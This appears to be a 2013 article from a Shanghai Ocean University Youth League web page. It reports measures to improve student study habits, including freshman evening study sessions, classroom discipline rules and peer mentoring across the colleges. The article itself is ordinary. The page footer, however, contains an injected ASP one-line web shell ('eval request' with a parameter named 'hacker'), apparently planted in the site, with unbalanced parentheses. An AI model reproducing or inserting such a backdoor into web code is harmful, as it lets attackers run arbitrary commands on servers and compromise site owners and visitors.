当前位置:共青团上海海洋大学委员会 >> 理论学习 >> 时政热点 >> 正文  
站内信息搜索:
教育实践活动系列报道之六:推进学风建设,让学生在成长与发展中得实惠
[2013年10月28日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    “有的同学觉得学校对学生太宽松了,有的同学整天沉迷在网络上,有的同学觉得学习没有目标……上课犯困、上网精神,平时闲散,期末玩命”,这是在学生座谈会上一些同学的发言。针对目前学生中存在学习目标迷茫、自主意识缺乏、学习态度不正等诸多问题,学生处与各学院从教师、辅导员和学生骨干等多支队伍入手,开展多项活动,多渠道、多形式提升学风建设水平。

座谈会

    以学生管理为发力点,多调研、勤走访

    群众线路教育实践活动展开以来,学生处深入学生工作负责人、辅导员、学生、社区各层面进行调研,充分了解学风建设中存在的问题,听取各方的建议。从调研中了解到,部分学生学习动力不足,学习依赖性较强,容易产生惰性,需要教师往前“拉一把”,辅导员从后“推一把”。调研中,学生工作队伍认真查找自身的问题,认为以后工作中应该更主动和教师对接,了解学生的学习情况,抓思想根源、促学习提升。例如外国语学院每次学生工作例会都邀请任课教师参与,共同研究学生的问题,密切配合,“教学”相长。

    以新生晚自习为着力点,养成良好学习习惯

    为进一步加强学风建设,营造浓厚的学习氛围,从本学期开始,学校在大一新生中开展晚自习工作,努力引导学生养成良好的学习习惯。前期,学生处就新生晚自习进行了广泛的调研,大部分大一学生认为晚自习对适应大学学习起到一定的促进作用,但是以怎样的形式开展,怎样更好地保证晚自习的学习效果是学生们普遍关心的问题。学生处专门和各学院就学生的建议进行了研讨,各学院根据学院和学生实际,制定了个性化的晚自习方案,比如信息学院依托教师的力量,结合专业特色,将晚自习和学业指导相结合;工程学院将学习经验交流分享等主题教育融入晚自习课堂,增强晚自习的吸引力;人文学院结合专业特色,规定晚自习内容,使晚自习学习更有针对性;爱恩学院充分发挥优秀学生的作用,利用“导生帮帮团”帮助大一新生解决学习中存在的困难;食品学院将晚自习和晨读相结合,全方位促进新生的养成教育;水产与生命学院、海洋科学学院、经济管理学院、外国语学院在晚自习中不定期开展“专题学习”,解决学生学习中的实际问题。各学院将晚自习的出勤和学习情况与学生的各项评优相结合,不断摸索和实践,以期建立合理的激励机制,保障晚自习工作的持续有效开展。学生处也将持续了解和分析晚自习的开展情况,并提出有针对性的建议和措施,进一步增强晚自习工作的效果。

    以课堂教学为支撑点,对学生提要求

    课堂教学是高等学校教学活动的重要环节,直接影响着高校教育教学水平和人才培养质量。调研中,我们也广泛听取了各方对课堂教学管理的建议,并配合教务处制定了《上海海洋大学关于重申课堂纪律加强课堂教学管理的规定》(讨论稿)。各学院在学生中通过主题班会、易班讨论等形式广泛宣传,引导和教育广大学生,自觉服从教师的课堂组织和管理,确保课堂纪律。

    结合学院实际,学风建设百花齐放

    各学院在推进优良学风建设过程中,也总结出了适合本学院的措施、方法。比如,生命学院实行本科生导师制,工程学院、外国语学院的教学与学生工作联动机制、辅导员与教师联动机制,在全院形成合力,形成全员育人环境,促进教学相长,促进学生成长;海洋学院的科创助力,提高学生内在学习动力,提高学习竞争力;食品学院、高职学院的晨读已蔚然成风;经管学院、爱恩学院实施学长引领计划、导生制,通过“被服务——服务——传承服务”的过程,构成一种良性循环,为新生正确价值观的形成打下坚实的实践基础;信息学院进一步完善新生晚自修制度,帮助学生更好的“转身”,切合学生的实际需求,使得新生同学们能尽快的适应大学的学习生活,真正从一名“考生”到“学生”的过渡。人文学院坚持学生群体的同辈辅导,发挥学生骨干的先锋模范作用,做好传帮带作用,带动其他同学文明修身,共同进步……

    推进学风建设,让学生在成长与发展中得实惠,是落实群众路线的重要内容,需要全校师生齐抓共管、持之以恒。让我们携起手来,共同为浓郁、厚重、有品格、有特色的优良学风而努力!

 

关闭窗口

上一篇:来自基层的声音”之一:如何实现科学的民主管理

下一篇:“来自基层的声音”之二:人文类基础课教学与大学生养成教育
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>